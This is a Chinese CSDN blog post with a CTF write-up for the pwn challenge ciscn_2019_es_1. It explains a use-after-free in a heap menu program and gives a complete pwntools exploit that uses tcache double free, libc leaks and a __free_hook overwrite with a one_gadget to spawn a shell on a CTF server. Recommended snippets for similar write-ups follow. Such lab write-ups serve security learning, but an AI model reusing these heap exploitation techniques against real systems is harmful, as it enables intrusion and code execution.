ciscn_2019_es_1 writeup

最新推荐文章于 2023-05-21 22:10:52 发布
最新推荐文章于 2023-05-21 22:10:52 发布
阅读量689 收藏
点赞数 1
文章标签: 1024程序员节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43921239/article/details/109252943
版权

基本情况

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled

简单堆管理程序,有增删查功能。chunk 上限为 12 个,有 0x18 的结构体,又通过链表管理结构体。结构体如下:

struct
{
	void **chunk_ptr;//8bit
    size_t size;//4bit
    int number;//(12-1)bit
}

漏洞

在 free 中,只是单单释放 data chunk ,结构体 chunk 以及对应链表都完整保留,释放 data chunk 时,没有将结构体中对应位置置零,造成 UAF 。

unsigned __int64 call()
{
  int v1; // [rsp+4h] [rbp-Ch]
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("Please input the index:");
  __isoc99_scanf("%d", &v1);
  if ( v1 < 0 && v1 > 12 )
    exit(0);
  if ( heap_addr[v1] )
    free(*heap_addr[v1]);                       // UAF
  puts("You try it!");
  puts("Done");
  return __readfsqword(0x28u) ^ v2;
}

思路

  1. double free 泄露堆地址,劫持 tcache struct ,控制链头分配到 chunk0 size
  2. free chunk0 到 unsorted bin 泄露 libc 地址
  3. 劫持 free_hook 为 onegadget

tcache 常规的 double free 泄露地址:

add(0x60,'a'*8,'b'*0xc)#0
free(0)
free(0)
show(0)

p.recvuntil("name:\n")
chunk_addr = u64(p.recv(6).ljust(8,'\x00'))

修改 tcache bin 中的数量以及链头地址:

add(0x60,p64(tcache_addr),'f'*8)#1
add(0x60,p64(tcache_addr),'e'*8)#2
add(0x60,('\x00'+'a'*5+'\x00').ljust(0x40,'a')+p64(tcache_addr)*3+p64(tcache_addr-0x10),'c'*0x4+p64(chunk_addr+0x70))#3
  • tcahce_addr 方便再次申请 chunk0
  • tcache_addr - 0x10 用来修改 chunk0 的 size
  • 劫持数量标志位保留一个,后面用来 double free

释放 chunk0 获取 libc 地址:

free(3)
show(3)

p.recvuntil("name:\n")
main_area = u64(p.recv(6).ljust(8,'\x00'))

再次 double free tcache 将 chunk 分配到 free_hook 上:

add(0x48,'\x00'*0x48,'b')
free(0)
free(0)
add(0x60,p64(free_hook),'b'*8)#1
add(0x60,p64(free_hook),'b'*8)#2
add(0x60,p64(onegadget),'b'*8)

EXP

from pwn import *
context(log_level='info',os='linux',arch='amd64',
	terminal=['tmux','sp','-h'])

# p = process("./ciscn_2019_es_1")
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf = ELF("./ciscn_2019_es_1")
p = remote("node3.buuoj.cn",27240)
libc = ELF("./libc-2.27.so")

def add(size,name,number):
	p.recvuntil(":")
	p.sendline('1')
	p.recvuntil("name\n")
	p.sendline(str(size))
	p.recvuntil(":\n")
	p.send(name)
	p.recvuntil("call:\n")
	p.send(number)
def show(id):
	p.recvuntil(":")
	p.sendline('2')
	p.recvuntil("index:\n")
	p.sendline(str(id))
def free(id):
	p.recvuntil(":")
	p.sendline('3')
	p.recvuntil("index:\n")
	p.sendline(str(id))

add(0x60,'a'*8,'b'*0xc)#0
free(0)
free(0)
show(0)

p.recvuntil("name:\n")
chunk_addr = u64(p.recv(6).ljust(8,'\x00'))
tcache_addr = chunk_addr - 0x270
log.info("tcache_addr:"+hex(tcache_addr))

add(0x60,p64(tcache_addr),'f'*8)#1
add(0x60,p64(tcache_addr),'e'*8)#2
add(0x60,('\x00'+'a'*5+'\x00').ljust(0x40,'a')+p64(tcache_addr)*3+p64(tcache_addr-0x10),'c'*0x4+p64(chunk_addr+0x70))#3
# add(0x80,'a','b')
free(3)
show(3)

p.recvuntil("name:\n")
main_area = u64(p.recv(6).ljust(8,'\x00'))
libc_base = main_area - 0x3ebca0
malloc_hook = libc_base + libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
log.info("free_hook:"+hex(free_hook))
log.info("malloc_hook:"+hex(malloc_hook))

one = [0x4f365,0x4f3c2,0x10a45c]
onegadget = libc_base + 0x4f322#one[1]
log.info("onegadget:"+hex(onegadget))

add(0x48,'\x00'*0x48,'b')
free(0)
free(0)
add(0x60,p64(free_hook),'b'*8)#1
add(0x60,p64(free_hook),'b'*8)#2
add(0x60,p64(onegadget),'b'*8)
# gdb.attach(p)

free(0)

p.interactive()
SkYe231_
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ciscn_sshop:参赛所用的sshop平台
05-10
2018ciscn sshop 2018ciscn半决赛已经结束了,就把题目放出来好了 题目是我和队友一起出的,可能一开始没设计好,有点偏难,但也是第一次出题,也花了蛮多心血,就记录一下 题目思路 主要是借鉴了0ctf的那道条件竞争 在购买商品时,一般的逻辑判断是:判断金额是否够->付款 于是我们在期间多加了一秒的延时就变成了:判断金额是否够->延时一秒->付款 当余额还有300的时候,两个要买300块钱的进程同时进入程序逻辑,判断到金额足够付款,然后就会进入付款 于是,就会虽然钱是300,但依旧买了两次,金额变成的负数 本来是想这样就可以了,后来想着由于是原题,队友就新增了一个刚学的phpinfo页面的文件包含。也就组成了我们的题目 writeup 详细的 docker环境 环境都在deploy里面了,可以直接运行部署即可 总结 第一次出题也收获了蛮多,以前也没自己出过题目 而且这次走运
ciscn_2019_es_1
z1r0的博客
01-12 848
ciscn_2019_es_1 查看保护 有一个uaf在call函数里,2.27下可以double free的libc,思路很明确,直接申请大堆泄露出libc_base,再double free劫持tcache链表,写入free_hook进tcache。改hook为one_gadget即可。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if
[BUUCTF]PWN——ciscn_2019_es_1
mcmuyanga的博客
07-20 1280
ciscn_2019_es_1 装了一个ubuntu18.04的机子,终于可以做2.27的题目了 例行检查,64位程序,保护全开 本地运行一下程序,经典的堆体菜单 64位ida载入,看一下各个选项的函数
BUUCTF ciscn_2019_es_1
doudoudedi
01-04 882
我本地直接用fastbin attack直接能打通但是远程似乎有问题 思路 首先申请一个smallbin大小的trunk然后释放打印得到libc基址,然后double free打fastbin attack之后写到libc去__malloc_hook写入one_gadget再次add获取shell 以下为ubuntu16的环境下本地也就是libc-2.23 exp: #!/usr/bin/pyth...
ciscn2019部分writeup
Sea_Sand息禅
06-06 1275
Web 1、JustSoso 拿到源码 打开靶机,查看源码得到提示: 一看就是文件读取,然后就文件读取走一波。 file=php://filter/read=convert.base64-encode/resource=hint.php base64解码拿到hint.php的源码: <?php class Handle{ private $handle; ...
ReverseRSA_writeup_rsa_appprivatekey_解密_
09-29
一个WriteUp,尝试从部分私钥中解密RSA加密的数据
ADS Writeup_1_ads_
09-29
Advanced Data Structure Writeup 1
Coursera-Prediction_Assignment_Writeup-1
02-24
Prediction_Assignment_Writeup 同行评分作业:预测作业撰写 ##指示 人们经常做的一件事是量化他们从事某项特定活动的数量,但是他们很少量化他们做某件事的程度。 在此项目中,您的目标是使用来自6位参与者的...
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。...
【pwn】ciscn_2019_es_2
Nothing
12-24 2754
例行检查 分析程序,程序存在system函数,但是不能直接得到flag。 vul函数中存在栈溢出,但只能溢出8个字节,只能盖到ebp和ret。vul函数中有两次read和printf第一次可以用来泄露ebp,得到栈地址,然后进行栈迁移。然后利用main函数返回时将控制流转到system。 根据一下汇编代码布置栈数据。 from pwn import * #io=process('ciscn...
BUUCTF ciscn_2019_c_1 write up
qq_43189757的博客
09-06 4854
分析: 程序的逻辑比较简单,漏洞点在encrypt 函数中的gets函数中 在encrypt函数中由gets函数输入数据,随后程序对输入的数据进行加密 1.如果是小写字母跟0xD异或 2.如果是大写字母跟0xE异或 3.如果是数字跟0xF异或 在这个循环中会破坏我们设置好的数据,但是可以通过两次异或运算又转换为我们设置好的数据 二进制文件中没有出现getshell和system之类的函数,所以要通...
BUUCTF ciscn_2019_c_1(rop_x64,泄露libc)
菜的只能随便写写博客
11-26 5824
由于Ubuntu18的环境很迷,这个题目只在kali上用本地libc完成过,脚本也是kali环境的 0x1 检查文件 64位elf 无canary 无PIE   0x02 流程分析 根据运行的流程,这个程序主要有两个功能,加密功能可以使用,但解密功能没办法使用,并且能够输入的地方就两个,一个选择程序,数字输入,第二个输入加密文本,字符串类型,之后的静态分析主要关注这两个地方。   0x02...
ciscn_2019_n_5
qq_39869547的博客
01-11 945
very easy # -*- coding:utf-8 -*- from PwnContext.core import * local = 1 if local == 1 : p = remote('node3.buuoj.cn','25056') else: ctx.binary = binary ctx.remote_libc = debug_libc ctx...
cisn_2019_es_3——ROP栈迁移
weixin_44164182的博客
07-17 177
ROP栈迁移 通过leave和ret指令,将栈帧劫持到指定地址。一般用于存在溢出,但可溢出的字节数不足以写入完成ROP chain的情况。通过栈帧劫持,在可供写入的缓冲区内完成ROP chain构造,然后将栈帧劫持到指定地址,完成控制流劫持。 leave = mov esp,ebp pop ebp ret= pop eip 通过栈帧劫持,存在栈溢出的位置最少只需溢出两个dword(qword in x64)就可以完全控制程序执行流 如上程序,char s处存在两个dword的溢出,可以覆盖last_
ciscn_2019_es_2
小白垃圾笔记2
05-21 635
小白垃圾做题笔记,不及建议阅读。声明,exp来自网络,调试过程自己调试,对于题目的理解仅供参考。由于本人也是小白,且pwn全靠自己摸索,所以有很多理解不到位的地方。如有错误,欢迎指正。
BUUCTF—ciscn_2019_n_1 1
qq_41560595的博客
09-24 4215
这道题是栈溢出题型,又不同于一般的栈溢出,在此做个总结。 查看权限 拖入IDA,F5可用函数 解题思路:这道题的意思是输入字符串v1,判断v2。考虑输入长字符串覆盖到存储v2的内存空间,把v2的值改掉。 因此,覆盖0x30-0x4=44个字节给v1,另外4个字节给v2 由于v2数值在内存中以16进制存储,所以,找到11.28125的16进制值。 存在两个比较指令,双击进去。 0x41348000就是16进制的11.28125。 编写脚本 from pwn import * p=remote('
ciscn_2019_c_1 Writeup
Calllin的博客
05-06 605
ciscn_2019_c_1 Writeup 前提 本程序防御策略 >checksec ./cisscn_2019_c_1 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 本程序逻辑是输入一个字符串,按照内置加密函数逻辑加密转化为密文。但在加密函数中存在溢出漏洞。 存在strlen()函数。使用
全部1000元 域名_DataCon 2020 DNS恶意域名分析方向冠军writeup
最新发布
05-24
恭喜您获得域名_DataCon 2020 DNS恶意域名分析方向冠军!以下是您的writeup: 赛题概述: 本次比赛的任务是对一组恶意域名进行分析。每个参赛者需要对提供的数据集进行分析,从中筛选出恶意域名,并对这些域名进行分类、分析和解释。数据集包括了近期出现的一些恶意域名,其中一部分已被官方确认。 分析流程: 1. 数据集的基本情况分析 首先,对数据集进行一些基本的统计分析,比如恶意域名的数量、出现频率、域名长度、TLD分布等等。这些分析可以帮助我们初步了解数据集的特点,为后续的分析提供一些指导。 2. 特征提取 在数据集分析的基础上,我们需要对每个域名进行特征提取。常用的特征包括域名长度、字符集分布、TLD类型、子域名数量、字母频率等等。提取出来的特征可以作为后续模型训练的输入。 3. 恶意域名分类 接下来,我们需要对每个域名进行分类。分类的目的是将恶意域名和正常域名分离开来,为后续的分析提供基础。常用的分类方法包括传统的机器学习分类算法(如决策树、SVM等)和深度学习分类算法(如CNN、LSTM等)。 4. 恶意域名分析 分类完成后,我们需要对恶意域名进行进一步的分析。具体来说,我们需要分析每个恶意域名的类型、攻击方式、受害者等等。这些分析可以帮助我们更好地了解恶意域名的本质和特点,为后续的防御工作提供指导。 5. 结果展示 最后,我们需要将分析结果进行展示。可以采用报告、PPT、图表等多种形式来呈现分析结果。同时,也可以将分析结果与其他团队进行交流,分享经验、互相学习。 总结: 通过对数据集的分析和特征提取,我们可以将恶意域名和正常域名分离开来,并进行进一步的分类和分析。这些工作可以帮助我们更好地了解恶意域名的本质和特点,为后续的防御工作提供指导。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值